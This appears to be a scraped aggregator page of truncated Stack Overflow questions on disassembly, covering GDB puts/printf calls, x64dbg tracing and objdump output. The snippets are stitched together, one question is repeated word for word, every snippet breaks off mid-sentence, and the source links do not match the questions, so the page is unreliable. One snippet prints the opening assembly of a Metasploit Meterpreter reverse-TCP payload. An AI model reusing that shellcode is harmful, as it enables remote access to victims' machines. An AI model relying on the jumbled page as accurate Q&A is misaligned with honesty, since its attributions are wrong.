disassembly

问题 I've been learning assembly language by disassembling some C code. When I disassemble this basic C code with GDB: #include <stdio.h> void main(void) { printf("Hello World\n"); } Among assembly code, it gives this line: 0x08048424 <+25>: call 0x80482e0 <puts@plt> However, when I disassemble below code which has an integer in printf function: #include <stdio.h> void main(void) { int a = 1; printf("Hello Word %d\n", a); } It gives this line: 0x0804842e <+35>: call 0x80482e0 <printf@plt> What is

问题 I've been learning assembly language by disassembling some C code. When I disassemble this basic C code with GDB: #include <stdio.h> void main(void) { printf("Hello World\n"); } Among assembly code, it gives this line: 0x08048424 <+25>: call 0x80482e0 <puts@plt> However, when I disassemble below code which has an integer in printf function: #include <stdio.h> void main(void) { int a = 1; printf("Hello Word %d\n", a); } It gives this line: 0x0804842e <+35>: call 0x80482e0 <printf@plt> What is

问题 I extracted the assembly code of the windows/meterpreter/reverse_tcp payload with lhost set to 127.0.0.1 and lport set to 443 , however after building the assembly program with fasm the program crashes, any ideas as to why? assembly code: format PE console use32 entry start start: pusha mov ebp,esp xor edx,edx mov edx,[fs:edx+0x30] mov edx,[edx+0xc] mov edx,[edx+0x14] xor edi,edi movzx ecx,word [edx+0x26] mov esi,[edx+0x28] xor eax,eax lodsb cmp al,0x61 jl 0x27 sub al,0x20 ror edi, 0xd add

问题 How to log CPU instructions executed by program with x64dbg? I saw https://reverseengineering.stackexchange.com/questions/18634/x64dbg-see-the-current-position question, but I can't find the way to log instructions. 回答1: As far as I understand - you want to log all the executed instructions. The easiest would be to log them in the file. To do this you need to: Pause the program, either via Pause option (F12) or using breakpoints Select Trace menu and then Trace into... (Ctrl+Alt+F7) or Trace

问题 I have a simple function in C language, in separate file string.c: void var_init(){ char *hello = "Hello"; } compiled with: gcc -ffreestanding -c string.c -o string.o And then I use command objdump -d string.o to see disassemble listing. What I got is: string.o: file format elf64-x86-64 Disassembly of section .text: 0000000000000000 <var_init>: 0: 55 push %rbp 1: 48 89 e5 mov %rsp,%rbp 4: 48 8d 05 00 00 00 00 lea 0x0(%rip),%rax # b <var_init+0xb> b: 48 89 45 f8 mov %rax,-0x8(%rbp) f: 90 nop

来源： https://stackoverflow.com/questions/19748074/meaning-of-0x8rsp

来源： https://stackoverflow.com/questions/19748074/meaning-of-0x8rsp

来源： https://stackoverflow.com/questions/46629794/how-to-understand-cmpl-0x0-0x30rbp-je

来源： https://stackoverflow.com/questions/46629794/how-to-understand-cmpl-0x0-0x30rbp-je

来源： https://stackoverflow.com/questions/40685938/differentiate-data-from-instructions-in-arm